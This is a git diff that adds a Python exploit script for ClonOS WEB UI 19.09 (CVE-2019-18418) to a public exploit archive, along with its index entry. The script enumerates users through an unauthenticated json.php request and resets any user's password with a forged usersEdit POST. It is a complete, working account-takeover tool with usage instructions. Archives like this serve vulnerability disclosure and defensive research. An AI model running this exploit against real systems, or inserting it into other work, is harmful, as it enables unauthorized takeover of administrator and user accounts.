diff --git a/exploits/php/webapps/47544.py b/exploits/php/webapps/47544.py new file mode 100755 index 000000000..cfe619513 --- /dev/null +++ b/exploits/php/webapps/47544.py @@ -0,0 +1,44 @@ +# Exploit Title: ClonOs WEB UI 19.09 - Improper Access Control +# Date: 2019-10-19 +# Exploit Author: İbrahim Hakan Şeker +# Vendor Homepage: https://clonos.tekroutine.com/ +# Software Link: https://github.com/clonos/control-pane +# Version: 19.09 +# Tested on: ClonOs +# CVE : 2019-18418 + + +import requests +from bs4 import BeautifulSoup +import sys + +def getUser(host): + reg=r'\"' + r1 = requests.post(host+"/json.php",data={"mode":"getJsonPage","path":"/users/","hash":"","db_path":""},headers={"X-Requested-With":"XMLHttpRequest"}) + r1_source = BeautifulSoup(r1.content,"lxml") + for k in r1_source.findAll("tr"): + for i in k.findAll("td")[0]: + print(f"[+]User Found: {i} User id: {k.get('id').replace(reg,'')}") +def changePassword(host,user,password,id): + data={ + "mode":"usersEdit", + "path":"/users/", + "hash":"", + "db_path":"", + "form_data[username]":f"{user}", + "form_data[password]":f"{password}", + "form_data[password1]":f"{password}", + "form_data[first_name]":"", + "form_data[last_name]":"", + "form_data[actuser]":"on", + "form_data[user_id]": int(id) + } + r2=requests.post(host,data=data,headers={"X-Requested-With":"XMLHttpRequest"}) + if r2.status_code==200:print("[+]OK") + else:print("[-]Fail") +if __name__=="__main__": + if len(sys.argv)>1: + if "getUser" in sys.argv[1]:getUser(sys.argv[2]) + elif "changePassword" in sys.argv[1]:changePassword(sys.argv[2],sys.argv[3],sys.argv[4],sys.argv[5]) + else:print("Fail parameter") + else:print("Usage: exploit.py getUser [http://ip_adres]\nexploit.py changePassword [http://ip_adres] [username] [new_password] [user_id]") \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index c9d266d08..c1b433848 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -41862,3 +41862,4 @@ id,file,description,date,author,type,platform,port 47540,exploits/php/webapps/47540.txt,"Wordpress Sliced Invoices 3.8.2 - 'post' SQL Injection",2019-10-24,"Lucian Ioan Nitescu",webapps,php, 47541,exploits/hardware/webapps/47541.txt,"AUO SunVeillance Monitoring System 1.1.9e - Incorrect Access Control",2019-10-24,Luca.Chiou,webapps,hardware, 47542,exploits/hardware/webapps/47542.txt,"AUO SunVeillance Monitoring System 1.1.9e - 'MailAdd' SQL Injection",2019-10-24,Luca.Chiou,webapps,hardware, +47544,exploits/php/webapps/47544.py,"ClonOs WEB UI 19.09 - Improper Access Control",2019-10-25,"İbrahim Hakan Şeker",webapps,php,